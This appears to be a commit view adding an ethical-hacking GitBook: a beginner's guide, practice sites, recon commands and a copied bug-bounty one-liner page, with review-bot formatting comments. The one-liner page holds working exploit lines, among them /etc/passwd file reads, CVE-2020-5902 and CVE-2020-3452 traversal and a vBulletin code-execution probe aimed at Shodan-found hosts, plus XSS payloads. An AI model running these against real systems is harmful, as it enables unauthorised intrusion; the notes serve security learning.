Projects STRLCPY Cipherops Commits 9693b23f
  • .gitbook/assets/image (1).png
  • .gitbook/assets/image (2).png
  • .gitbook/assets/image (3).png
  • .gitbook/assets/image (4).png
  • .gitbook/assets/image (5).png
  • .gitbook/assets/image (6).png
  • .gitbook/assets/image (7).png
  • .gitbook/assets/image (8).png
  • .gitbook/assets/image (9).png
  • .gitbook/assets/image.png
    README.md
    1  -<h1 align="center">Hi 👋, I'm Harshith ms</h1>
    2  -<h3 align="center">A passionate frontend developer, Ethical Hacker, Designer, Dancer from India</h3>
     1 +# 🌏 Journeying Through the World of Ethical Hacking with Cipher-ops
    3 2   
    4  -- 🌱 I’m currently learning **Python, solidity, ethereum**
     3 +{% hint style="info" %}
     4 +**GitBook tip:** your product docs aren't just a reference of all your features! use them to encourage folks to perform certain actions and discover the value in your product.
     5 +{% endhint %}
    5 6   
    6  -- 🤝 I’m looking for help with **web 3.0**
     7 +## <mark style="color:green;">Overview</mark>
    7 8   
    8  -- 💬 Ask me about **Web application security , OSINT , Network security**
     9 +#### <mark style="color:green;">Unveiling the Secrets of Vulnerabilities</mark>
     10 + 
     11 +> Embark on an educational journey that takes you through the fascinating world of ethical hacking. Our curated content covers a wide range of topics, including reconnaissance, vulnerability scanning, exploitation, and post-exploitation techniques. With each article, you'll gain
    9 12   
    10  -- 📫 How to reach me **[email protected]**
     13 +> Explore the intriguing realm of vulnerabilities and witness their inner workings unfold before your eyes. Our meticulously crafted bug bounty notes reveal the anatomy of various vulnerabilities, shedding light on their root causes and potential exploits. Gain a deep understanding of common vulnerabilities like XSS, SQL injection, and CSRF, as well as emerging threats and cutting-edge techniques.
    11 14   
    12  -<h3 align="left">Connect with me:</h3>
    13  -<p align="left">
    14  -</P>
    15 15   
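Review bot: the `{% hint %}` block at lines 3-5 is the unedited GitBook starter placeholder ("GitBook tip: your product docs aren't just a reference of all your features! ..."), not content about this project; replace it with a hint about what these notes cover, or delete it. Separately, the first blockquote on line 11 stops mid-sentence at "With each article, you'll gain" and needs its ending restored, and the two coloured headings on lines 7 and 9 jump from `##` to `####`, skipping a level, which makes the page outline inconsistent; use `###` for the sub-heading.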
    SUMMARY.md
     1 +# Table of contents
     2 + 
     3 +* [🌏 Journeying Through the World of Ethical Hacking with Cipher-ops](README.md)
     4 +* [Let's Start](lets-start/README.md)
     5 + * [🤩 Embarking on Your Hacking Journey: A Guide for Beginners](lets-start/embarking-on-your-hacking-journey-a-guide-for-beginners/README.md)
     6 + * [🥳 Exploring Top Platforms and Websites for Hacking Practice and Learning](lets-start/embarking-on-your-hacking-journey-a-guide-for-beginners/exploring-top-platforms-and-websites-for-hacking-practice-and-learning.md)
     7 + 
     8 +## Overview
     9 + 
     10 +* [ℹ Recon Tips](overview/recon-tips/README.md)
     11 + * [Best Recon Technique For Active Subdomain Enumeration](overview/recon-tips/best-recon-technique-for-active-subdomain-enumeration.md)
     12 + * [Mastering the Art of Information Gathering](overview/recon-tips/mastering-the-art-of-information-gathering.md)
     13 + * [One Liner from Awesome bug bounty](overview/recon-tips/one-liner-from-awesome-bug-bounty.md)
     14 + * [Resources](overview/recon-tips/resources/README.md)
     15 + * [Introducing 20 web-application hacking tools🔥🤩🌵](overview/recon-tips/resources/introducing-20-web-application-hacking-tools.md)
     16 + 
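Review bot: lines 14-15 add entries for `overview/recon-tips/resources/README.md` and `overview/recon-tips/resources/introducing-20-web-application-hacking-tools.md`, but neither file appears in this commit's file list, so the built book will show empty or broken pages until they land; either add the files in this commit or hold the SUMMARY entries back. Also, line 6 nests "Exploring Top Platforms..." under "Embarking on Your Hacking Journey", while the actual seven-step beginner's guide sits in the parent `lets-start/README.md`; consider moving the guide under the "Embarking" page so titles and content line up.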
    lets-start/README.md
     1 +# Let's Start
     2 + 
     3 +[<mark style="color:red;">**A Guide to Getting Started in Hacking**</mark>](#user-content-fn-1)[^1]
     4 + 
     5 + 
     6 + 
     7 +**Step 1: Cultivate a Curious Mindset**
     8 + 
     9 +Curiosity is the driving force behind every successful hacker. Embrace your natural curiosity and thirst for knowledge as you delve into the world of cybersecurity. Ask questions, challenge assumptions, and develop a deep desire to understand how systems and technologies work.
     10 + 
     11 +### Step 2: Learn the Fundamentals
     12 + 
     13 +Building a strong foundation is crucial for any aspiring hacker. Start by familiarizing yourself with essential concepts such as networking, operating systems, programming languages, and web technologies. Online resources, tutorials, and interactive platforms provide valuable learning materials to help you grasp these fundamentals.
     14 + 
     15 +### Step 3: Practice with Capture The Flag (CTF) Challenges
     16 + 
     17 +Put your skills to the test by participating in Capture The Flag challenges. CTFs simulate real-world hacking scenarios and allow you to solve puzzles, exploit vulnerabilities, and think creatively to overcome obstacles. They provide an excellent opportunity to apply your knowledge in a practical and engaging environment.
     18 + 
     19 +### Step 4: Join a Hacking Community
     20 + 
     21 +Connect with fellow hackers through online communities, forums, and social media groups. Engaging with others who share your passion will expose you to diverse perspectives, valuable insights, and collaborative learning opportunities. Networking within the hacking community can open doors to new resources, mentorship, and growth.
     22 + 
     23 +### Step 5: Stay Updated with Latest Trends
     24 + 
     25 +The field of hacking is constantly evolving, with new techniques, vulnerabilities, and technologies emerging regularly. Stay up-to-date by following reputable cybersecurity blogs, attending conferences, and joining relevant mailing lists. Continuous learning is vital to keeping your skills sharp and adapting to the ever-changing landscape of cybersecurity.
     26 + 
     27 +### Step 6: Embrace Ethical Hacking Principles
     28 + 
     29 +Ethics and responsibility are fundamental in the world of hacking. As an ethical hacker, it's crucial to prioritize legality, integrity, and respect for others' privacy. Understand and adhere to ethical hacking guidelines and legal frameworks to ensure your actions contribute positively to the security community.
     30 + 
     31 +### Step 7: Never Stop Learning and Experimenting
     32 + 
     33 +Hacking is a journey of perpetual learning. Continuously challenge yourself, explore new areas of cybersecurity, and expand your skill set. Experiment with different tools, techniques, and methodologies to broaden your understanding and develop your unique approach to problem-solving.
     34 + 
     35 +Embarking on a hacking journey is an exhilarating experience filled with endless possibilities. Embrace the challenges, stay persistent, and never stop learning. Together, let's unlock the incredible world of hacking and make a difference in the realm of cybersecurity.
     36 + 
     37 +[^1]:
     38 + 
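Review bot: the footnote reference `[^1]` on line 3 points at a definition on line 37 that has no body, so the rendered page shows a footnote marker leading nowhere; either fill in the source of the guide there or remove both the `[^1]` and the `#user-content-fn-1` link wrapped around the title. Also, Step 1 (line 7) is a bold paragraph while Steps 2-7 are `###` headings, so Step 1 is missing from the page outline; make it `### Step 1: Cultivate a Curious Mindset` for consistency, and drop the three consecutive blank lines 4-6.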
    lets-start/embarking-on-your-hacking-journey-a-guide-for-beginners/README.md
     1 +# 🤩 Embarking on Your Hacking Journey: A Guide for Beginners
     2 + 
     3 +<mark style="color:green;">**Join us on this captivating journey and become part of a vibrant community passionate about ethical hacking.**</mark> Together, let's explore the fascinating world of cybersecurity, unlock new possibilities, and elevate our skills to greater heights. Embrace the thrill of hacking, share knowledge, and connect with like-minded individuals who share your passion. Join us now and embark on this beautiful journey together!
     4 + 
     5 +FROM > CIPHER-OPS
     6 + 
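Review bot: apart from one welcome paragraph this page has no body, yet its SUMMARY title promises "A Guide for Beginners"; the guide itself lives in `lets-start/README.md`. Either move the seven steps here or retitle the page. The sign-off `FROM > CIPHER-OPS` on line 5 also renders as a literal greater-than sign (it is not a blockquote marker mid-line); replace it with a plain sentence or drop it.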
    lets-start/embarking-on-your-hacking-journey-a-guide-for-beginners/exploring-top-platforms-and-websites-for-hacking-practice-and-learning.md
     1 +---
     2 +coverY: 0
     3 +layout:
     4 + cover:
     5 + visible: true
     6 + size: full
     7 + title:
     8 + visible: true
     9 + description:
     10 + visible: true
     11 + tableOfContents:
     12 + visible: true
     13 + outline:
     14 + visible: true
     15 + pagination:
     16 + visible: true
     17 +---
     18 + 
     19 +# 🥳 Exploring Top Platforms and Websites for Hacking Practice and Learning
     20 + 
     21 +## _<mark style="color:green;">**Learn by Doing**</mark>_
     22 + 
     23 +* [<mark style="color:green;">HackTheBox</mark>](exploring-top-platforms-and-websites-for-hacking-practice-and-learning.md#https-www.hackthissite.org-missions-basic) <mark style="color:green;">&</mark> [<mark style="color:green;">HackTheBox Academy</mark>](https://academy.hackthebox.eu/catalogue)<mark style="color:green;">:</mark> HackTheBox provides online machines to practice hacking and is considered one of the best platforms for learning through practical experience. If you're new to hacking, it is recommended to start by solving retired machines while following Ippsec videos. HackTheBox Academy is a new platform that offers guided learning, making it an excellent resource for practicing hacking and mastering specific technologies.
     24 +* [<mark style="color:green;">TryHackMe</mark>](https://tryhackme.com/)<mark style="color:green;">:</mark> TryHackMe offers virtual machines that can be solved through step-by-step walkthroughs, making it ideal for beginners. It provides a range of normal Capture The Flag (CTF) challenges where you can test your skills by hacking into the machines.
     25 +* [<mark style="color:green;">Rootme</mark>](https://www.root-me.org/)<mark style="color:green;">:</mark> Rootme is a platform that hosts virtual machines for hacking practice. It offers a variety of online machines to explore and exploit.
     26 +* [<mark style="color:green;">Vulnhub</mark>](https://www.vulnhub.com/)<mark style="color:green;">:</mark> Vulnhub provides downloadable virtual machines for hacking. You can download the machines and challenge yourself by finding vulnerabilities and exploiting them.
     27 +* [<mark style="color:green;">Hack.me</mark>](https://hack.me/)<mark style="color:green;">:</mark> Hack.me is a community platform that allows users to share and access hacking-related content, including challenges, tools, and resources.
     28 +* [<mark style="color:green;">Hacker101</mark>](https://www.hacker101.com/)<mark style="color:green;">:</mark> Hacker101 is a free website offering videos and Capture The Flag (CTF) challenges for learning hacking skills. It provides a comprehensive and practical approach to help you enhance your knowledge.
     29 +* [<mark style="color:green;">Crackmes.one</mark>](https://crackmes.one/)<mark style="color:green;">:</mark> Crackmes.one is a platform that focuses on forensic learning. It provides numerous binaries and challenges for practicing and improving your forensic skills.
     30 +* [<mark style="color:green;">HackThisSite</mark>](https://www.hackthissite.org/missions/basic/)<mark style="color:green;">:</mark> HackThisSite offers various missions and challenges to test and develop your hacking abilities. It covers a wide range of topics, from basic to advanced levels.
     31 +* [<mark style="color:green;">AttackDefense</mark>](https://attackdefense.com/)<mark style="color:green;">:</mark> AttackDefense offers hands-on, gamified, and interactive training environments for honing your offensive and defensive cybersecurity skills.
     32 +* [<mark style="color:green;">PortSwigger Web Security Academy</mark>](https://portswigger.net/web-security/dashboard)<mark style="color:green;">:</mark> PortSwigger Web Security Academy provides a collection of web exploitation labs and exercises to help you understand and strengthen your knowledge of web security.
     33 + 
     34 +These platforms and websites offer diverse opportunities for learning and practicing hacking skills, catering to beginners as well as more experienced individuals. Engage with these resources to enhance your understanding of cybersecurity and become proficient in ethical hacking.
     35 + 
     36 + 
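Review bot: the HackTheBox link on line 23 does not go to HackTheBox at all; it points at an in-page anchor (`exploring-top-platforms-...md#https-www.hackthissite.org-missions-basic`) that belongs to the HackThisSite entry, so readers who click "HackTheBox" land on the wrong item. Link it to the platform's own site instead. Line 29 describes Crackmes.one as a "forensic learning" platform; it hosts crackmes, i.e. reverse-engineering challenges, so the description should say reverse engineering. Lines 4-16 of the front matter show every nested key at the same one-space indent; confirm the YAML nesting under `layout:` (cover, title, description, tableOfContents, outline, pagination, each with its own `visible:`) is intact, since a mis-indented `layout:` block will not be parsed as intended.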
    overview/recon-tips/README.md
     1 +# ℹ Recon Tips
     2 + 
     3 +<div data-full-width="false">
     4 + 
     5 +<figure><img src="../../.gitbook/assets/image (7).png" alt=""><figcaption><p>The Bug Hunter's Methodology v4.0 - Recon Edition Breakdown,thanks to<a href="https://t.me/jhaddix"> @jhaddix</a></p></figcaption></figure>
     6 + 
     7 +</div>
     8 + 
     9 +{% embed url="https://speakerdeck.com/harshbothra/offensive-recon-for-bug-bounty-hunters?slide=18" %}
     10 +Recon for Bug Bounty Hunters
     11 +{% endembed %}
     12 + 
     13 + 
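Review bot: the figure on line 5 has an empty `alt=""`; give it the description the caption already carries ("The Bug Hunter's Methodology v4.0 - Recon Edition Breakdown") so the image stays meaningful when it fails to load, and add the missing space in "Breakdown,thanks to". The two trailing blank lines 12-13 can go.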
    overview/recon-tips/best-recon-technique-for-active-subdomain-enumeration.md
     1 +# Best Recon Technique For Active Subdomain Enumeration
     2 + 
     3 +\
     4 +In this article, we will explore some effective reconnaissance techniques that can assist you in discovering valuable information. Let's dive into these techniques for a comprehensive recon experience.
     5 + 
     6 +<mark style="color:green;">**Technique 1:**</mark> Active Subdomain Enumeration Active subdomain enumeration is a powerful technique often overlooked in favor of passive methods. There are two ways to perform active subdomain enumeration:
     7 + 
     8 +1. <mark style="color:green;">Brute Forcing Subdomains Using Wordlist:</mark> By utilizing a DNS wordlist and tools like FFuF and Best DNS Wordlist, you can effectively brute force subdomains. Execute the following command:
     9 + 
     10 +```
     11 +Command: ffuf -u “https://FUZZ.target.com" -w <path_to_wordlist> -mc 200,301,302,403
     12 +```
     13 + 
     14 +<figure><img src="https://miro.medium.com/max/720/1*6dHXrt4y2JSwyUbn2UufIQ.png" alt="Active Subdomain Enumeration Using FFUF"><figcaption><p>Active Subdomain Enumeration Using FFUF</p></figcaption></figure>
     15 + 
     16 +<mark style="color:green;">Permutation Brute force</mark>: Create a new list of resolved subdomains by employing permutation, mutation, and alteration techniques with a wordlist. The tool altdns simplifies this process. Execute the following command:
     17 + 
     18 +```markup
     19 +Command: altdns -i hackerone.txt -o data_output -r -s final.txt -w words.txt
     20 +```
     21 + 
     22 +<figure><img src="../../.gitbook/assets/image (9).png" alt="Active Subdomain Enumeration Using FFUF"><figcaption><p>Active Subdomain Enumeration Using FFUF</p></figcaption></figure>
     23 + 
     24 +<mark style="color:green;">Technique 2:</mark> Favicon Hashes Favicons, the icons representing your website, possess unique hash values that can aid in discovering domains sharing the same hash function. Use the FavFreak tool to calculate favicon hashes. Execute the following command:
     25 + 
     26 +```
     27 +Command: cat urls.txt | python3 favfreak.py
     28 +```
     29 + 
     30 +<figure><img src="../../.gitbook/assets/image (5).png" alt="Favicon hash detecting using FavFreak"><figcaption><p>Favicon hash detecting using FavFreak</p></figcaption></figure>
     31 + 
     32 +Once the hash is calculated, you can use the same on internet search engines such as **shodan** to get the mass websites.
     33 + 
     34 +<figure><img src="https://miro.medium.com/max/720/1*WXdimyHXCrOkWW_YtDTDOQ.png" alt="Using shodan Search Engine to detect site that have same favicon hashed"><figcaption><p>Using shodan Search Engine to detect site that have same favicon hashed</p></figcaption></figure>
     35 + 
     36 +More About this Tool [here](https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139).
     37 + 
     38 +<mark style="color:green;">Technique 3</mark>: Nrich is an excellent command-line tool for analyzing IPs in a file for CVEs, open ports, and vulnerabilities. Note that Nrich only accepts IP addresses as input, not domain names. To find IP addresses of hostnames, use the dnsx tool. Execute the following command:
     39 + 
     40 +```
     41 +command: cat subdomains.txt | dnsx -a -resp-only | nrich -
     42 +```
     43 + 
     44 +<figure><img src="../../.gitbook/assets/image.png" alt="Using shodan Search Engine to detect site that have same favicon hashed"><figcaption><p>use a nrich tool to check out the subdomains </p></figcaption></figure>
     45 + 
     46 +<mark style="color:green;">Technique 4:</mark> Choosing the Right Target When dealing with applications that have numerous subdomains, selecting the right subdomain to start hunting can be challenging. Utilize the interesting subs gf pattern list to identify interesting subdomains worth investigating. Execute the following command:
     47 + 
     48 +```
     49 +cat subdoma.txt | gf interestingsubs
     50 +```
     51 + 
     52 +<figure><img src="https://miro.medium.com/max/720/1*TsN_DOGqFOX-CYv7G-Sbjw.png" alt="gf interestingsubs pattern list to find interesting subdomains"><figcaption><p>gf interestingsubs <strong>pattern list to find interesting subdomains</strong></p></figcaption></figure>
     53 + 
     54 +####
     55 + 
     56 +<figure><img src="https://miro.medium.com/max/720/1*Dz43T4JUM49M4vdpgSlCYw.png" alt="Performing whoislookup on target domain"><figcaption><p>Performing whoislookup on target domain</p></figcaption></figure>
     57 + 
     58 + 
     59 + 
     60 +<figure><img src="https://miro.medium.com/max/720/1*bVYAtg61mEC2Hg_oO1cevA.jpeg" alt="Searching For Tech Emails"><figcaption><p>Searching For Tech Emails</p></figcaption></figure>
     61 + 
     62 +<mark style="color:green;">Technique 5</mark>: Reverse Whoislookup Performing a WHOIS lookup on a target domain and checking for Tech Emails can provide WHOIS registration results. This information can be utilized to gather all assets associated with an organization. Follow these steps: A. Perform a WHOIS lookup on the target domain and check for Tech Emails. B. Visit drs.whoisxmlapi.com, sign up/login (500 free credits initially), and search with the Tech Email to discover all assets belonging to the target organization.
     63 + 
     64 +<mark style="color:green;">Technique 6</mark>: Uncover, a powerful tool developed by the Projectdisovery team, enables you to swiftly discover exposed hosts on the internet. It leverages Shodan, Censys, and Fofa for host discovery. To make the most of Uncover, create a dorks list and provide it as input. Execute the following command:
     65 + 
     66 +```
     67 +Command: cat dorks.txt | uncover
     68 +```
     69 + 
     70 +<figure><img src="../../.gitbook/assets/image (6).png" alt=""><figcaption><p>uncover tool link <a href="https://github.com/projectdiscovery/uncover">https://github.com/projectdiscovery/uncover</a></p></figcaption></figure>
     71 + 
     72 + 
     73 + 
     74 +: Finding Hidden Paths Using Meg Discovering hidden paths or directories is a crucial reconnaissance technique. Meg is a powerful tool that facilitates quick and efficient directory brute-forcing without overwhelming network traffic. Execute the following command:
     75 + 
     76 +```
     77 +Command: meg paths.txt hosts.txt output
     78 +```
     79 + 
     80 +<figure><img src="https://miro.medium.com/max/720/1*hQwOzRPoo7zWDYUWvO0aoQ.png" alt="File List Created for the host xyz.com with request and response"><figcaption><p>File List Created for the host xyz.com with request and response</p></figcaption></figure>
     81 + 
     82 +<mark style="color:green;">Technique 8</mark>: Finding Open Ports and Services Identifying open ports and services running on them is essential for web application assessment. Naabu is a fast port scanner that simplifies the process and even allows running Nmap scans. Execute the following command:
     83 + 
     84 +```
     85 +Command: naabu -host target.com
     86 +```
     87 + 
     88 +<figure><img src="../../.gitbook/assets/image (4).png" alt=""><figcaption><p>Finding open ports and service running using naabu</p></figcaption></figure>
     89 + 
     90 +:clap:Thank you for taking the time to explore these amazing reconnaissance techniques. :smile:We hope you found this blog informative and useful in your endeavors.
     91 + 
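Review bot: the ffuf command on line 11 will not run as pasted: the URL opens with a typographic quote `“` and closes with a straight `"`, so the shell treats `“https://FUZZ.target.com` as a literal word and the `"` as an unterminated quote. Use straight quotes on both sides, drop the `Command:` / `command:` prefixes inside the fences (lines 11, 19, 27, 41, 67, 77, 85) since they get copied along with the command, and tag the fences `bash` instead of leaving them untagged or labelled `markup` (line 18). Labels and captions also need attention: the "Technique 7" label is missing from line 74, which begins with a bare `: Finding Hidden Paths Using Meg`; "Permutation Brute force" on line 16 is the second of the two methods announced on line 6 but is not numbered `2.`; the alt text and caption on line 22 repeat "Active Subdomain Enumeration Using FFUF" for an altdns screenshot, and the alt text on line 44 repeats the Shodan favicon caption for the nrich screenshot; the two WHOIS figures (lines 56 and 60) and an empty `####` heading (line 54) sit above the Technique 5 paragraph they illustrate, and steps A and B on line 62 would read better as a list. Line 24 should say favicons share the same hash value, not "the same hash function", "Projectdisovery" on line 64 is ProjectDiscovery, and `subdoma.txt` on line 49 looks like a truncated `subdomains.txt`, the filename used on line 41.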
    overview/recon-tips/mastering-the-art-of-information-gathering.md
     1 +---
     2 +description: 'NOTE: This is just a information, for further reading do check the article'
     3 +---
     4 + 
     5 +# Mastering the Art of Information Gathering
     6 + 
     7 +### Introduction
     8 + 
     9 +* Article source: [Recon Everything](https://infosecwriteups.com/recon-everything-48aafbb8987)
     10 +* Key focus: Comprehensive notes on mastering the art of information gathering through reconnaissance techniques.
     11 + 
     12 +### Table of Contents:
     13 + 
     14 +1. What is Reconnaissance?
     15 +2. Passive Reconnaissance Techniques
     16 + * WHOIS Lookup
     17 + * Google Dorking
     18 + * OSINT (Open-Source Intelligence)
     19 +3. Active Reconnaissance Techniques
     20 + * Port Scanning
     21 + * Banner Grabbing
     22 + * DNS Enumeration
     23 +4. Web Reconnaissance Techniques
     24 + * Website Crawling
     25 + * Subdomain Enumeration
     26 + * Web Application Fingerprinting
     27 +5. Network Reconnaissance Techniques
     28 + * Network Scanning
     29 + * ARP Scanning
     30 + * SNMP Enumeration
     31 +6. Social Engineering Reconnaissance Techniques
     32 + * Social Media Profiling
     33 + * Phishing
     34 + * Dumpster Diving
     35 +7. Tools and Resources for Reconnaissance
     36 + * Nmap
     37 + * theHarvester
     38 + * Shodan
     39 + * Recon-ng
     40 + * Maltego
     41 + * SpiderFoot
     42 +8. Reconnaissance Best Practices
     43 + * Legal and Ethical Considerations
     44 + * Information Gathering Methodology
     45 + * Documentation and Reporting
     46 +9. Conclusion
     47 + 
     48 +### Summary and Key Takeaways:
     49 + 
     50 +* Reconnaissance is the process of gathering information to gain insight into a target system or organization.
     51 +* Passive techniques involve collecting publicly available data without directly interacting with the target.
     52 +* Active techniques involve direct interaction and probing of the target system.
     53 +* Web reconnaissance focuses on gathering information about websites, subdomains, and web applications.
     54 +* Network reconnaissance aims to discover hosts, open ports, and network vulnerabilities.
     55 +* Social engineering reconnaissance involves collecting information through social manipulation techniques.
     56 +* Various tools and resources are available to streamline the reconnaissance process.
     57 +* Adhering to legal and ethical guidelines is crucial during reconnaissance activities.
     58 +* A structured methodology and proper documentation enhance the effectiveness of reconnaissance efforts.
     59 + 
     60 +### Conclusion
     61 + 
     62 +Reconnaissance serves as the foundation for successful information gathering in the field of cybersecurity. By understanding the various techniques and tools available, security professionals can gain valuable insights into their targets. However, it is essential to remember the importance of legal and ethical considerations when conducting reconnaissance activities. With a comprehensive approach and proper documentation, the art of reconnaissance can be mastered, leading to more effective cybersecurity strategies.
     63 + 
     64 +Note: This article was created based on the content from [Recon Everything](https://infosecwriteups.com/recon-everything-48aafbb8987) as a reference source.
     65 + 
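Review bot: the front-matter description on line 2 reads "This is just a information, for further reading do check the article"; make it "These are summary notes only; see the linked article for the full text". The "Table of Contents:" heading on line 12 is misleading, since the numbered list that follows is the outline of the source article and none of those nine sections exist on this page; retitle it "Topics covered in the source article", and drop the trailing colons from the `###` headings on lines 12 and 48 to match "Introduction" and "Conclusion".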
    overview/recon-tips/one-liner-from-awesome-bug-bounty.md
     1 +# One Liner from Awesome bug bounty
     2 + 
     3 +## Awesome One-liner Bug Bounty [![Awesome](https://awesome.re/badge-flat2.svg)](https://github.com/dwisiswant0/awesome-oneliner-bugbounty/tree/master) <a href="#https-github.com-dwisiswant0-awesome-oneliner-bugbounty-tree-master" id="https-github.com-dwisiswant0-awesome-oneliner-bugbounty-tree-master"></a>
     4 + 
     5 +> A collection of awesome one-liner scripts especially for bug bounty.
     6 + 
     7 +This repository stores and houses various one-liner for bug bounty tips provided by me as well as contributed by the community. Your contributions and suggestions are heartily♥ welcome.
     8 + 
     9 +### Definitions
     10 + 
     11 +This section defines specific terms or placeholders that are used throughout one-line command/scripts.
     12 + 
     13 +* 1.1. "**HOST**" defines one hostname, (sub)domain, or IP address, e.g. replaced by `internal.host`, `domain.tld`, `sub.domain.tld`, or `127.0.0.1`.
     14 +* 1.2. "**HOSTS.txt**" contains criteria 1.1 with more than one in file.
     15 +* 2.1. "**URL**" definitely defines the URL, e.g. replaced by `http://domain.tld/path/page.html` or somewhat starting with HTTP/HTTPS protocol.
     16 +* 2.2. "**URLS.txt**" contains criteria 2.1 with more than one in file.
     17 +* 3.1. "**FILE.txt**" or "**FILE**`{N}`**.txt**" means the files needed to run the command/script according to its context and needs.
     18 +* 4.1. "**OUT.txt**" or "**OUT**`{N}`**.txt**" means the file as the target storage result will be the command that is executed.
     19 + 
     20 +#### Local File Inclusion
     21 + 
     22 +> @dwisiswant0
     23 + 
     24 +```bash
     25 +gau HOST | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
     26 +```
     27 + 
     28 +#### Open-redirect
     29 + 
     30 +> @dwisiswant0
     31 + 
     32 +```bash
     33 +export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
     34 +```
     35 + 
     36 +> @N3T\_hunt3r
     37 + 
     38 +```bash
     39 +cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null
     40 +```
     41 + 
     42 +#### XSS
     43 + 
     44 +> @cihanmehmet
     45 + 
     46 +```bash
     47 +gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee OUT.txt
     48 +```
     49 + 
     50 +> @fanimalikhack
     51 + 
     52 +```bash
     53 +waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt
     54 +```
     55 + 
     56 +> @oliverrickfors
     57 + 
     58 +```bash
     59 +cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
     60 +```
     61 + 
     62 +#### Prototype Pollution
     63 + 
     64 +> @R0X4R
     65 + 
     66 +```bash
     67 +subfinder -d HOST -all -silent | httpx -silent -threads 300 | anew -q FILE.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' FILE.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE"
     68 +```
     69 + 
     70 +#### CVE-2020-5902
     71 + 
     72 +> @Madrobot\_
     73 + 
     74 +```bash
     75 +shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done
     76 +```
     77 + 
     78 +#### CVE-2020-3452
     79 + 
     80 +> @vict0ni
     81 + 
     82 +```bash
     83 +while read LINE; do curl -s -k "https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" | head | grep -q "Cisco" && echo -e "[${GREEN}VULNERABLE${NC}] $LINE" || echo -e "[${RED}NOT VULNERABLE${NC}] $LINE"; done < HOSTS.txt
     84 +```
     85 + 
     86 +#### CVE-2022-0378
     87 + 
     88 +> @7h3h4ckv157
     89 + 
     90 +```bash
     91 +cat URLS.txt | while read h do; do curl -sk "$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22test&from_url=x"|grep -qs "onmouse" && echo "$h: VULNERABLE"; done
     92 +```
     93 + 
     94 +#### vBulletin 5.6.2 - 'widget\_tabbedContainer\_tab\_panel' Remote Code Execution
     95 + 
     96 +> @Madrobot\_
     97 + 
     98 +```bash
     99 +shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;
     100 +```
     101 + 
     102 +#### Find JavaScript Files
     103 + 
     104 +> @D0cK3rG33k
     105 + 
     106 +```bash
     107 +assetfinder --subs-only HOST | gau | egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Zo-9_]+" | sed -e 's, 'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'):echo -e "\e[1;33m$url\n" "\e[1;32m$vars"; done
     108 +```
     109 + 
     110 +#### Extract Endpoints from JavaScript
     111 + 
     112 +> @renniepak
     113 + 
     114 +```bash
     115 +cat FILE.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | sort -u
     116 +```
     117 + 
     118 +#### Get CIDR & Org Information from Target Lists
     119 + 
     120 +> @steve\_mcilwain
     121 + 
     122 +```bash
     123 +for HOST in $(cat HOSTS.txt);do echo $(for ip in $(dig a $HOST +short); do whois $ip | grep -e "CIDR\|Organization" | tr -s " " | paste - -; d
     124 +one | uniq); done
     125 +```
     126 + 
     127 +#### Get Subdomains from RapidDNS.io
     128 + 
     129 +> @andirrahmani1
     130 + 
     131 +```bash
     132 +curl -s "https://rapiddns.io/subdomain/$1?full=1#result" | grep "<td><a" | cut -d '"' -f 2 | grep http | cut -d '/' -f3 | sed 's/#results//g' | sort -u
     133 +```
     134 + 
     135 +#### Get Subdomains from BufferOver.run
     136 + 
     137 +> @\_ayoubfathi\_
     138 + 
     139 +```bash
     140 +curl -s https://dns.bufferover.run/dns?q=.HOST.com | jq -r .FDNS_A[] | cut -d',' -f2 | sort -u
     141 +```
     142 + 
     143 +> @AnubhavSingh\_
     144 + 
     145 +```bash
     146 +export domain="HOST"; curl "https://tls.bufferover.run/dns?q=$domain" | jq -r .Results'[]' | rev | cut -d ',' -f1 | rev | sort -u | grep "\.$domain"
     147 +```
     148 + 
     149 +#### Get Subdomains from Riddler.io
     150 + 
     151 +> @pikpikcu
     152 + 
     153 +```bash
     154 +curl -s "https://riddler.io/search/exportcsv?q=pld:HOST" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
     155 +```
     156 + 
     157 +#### Get Subdomains from VirusTotal
     158 + 
     159 +> @pikpikcu
     160 + 
     161 +```bash
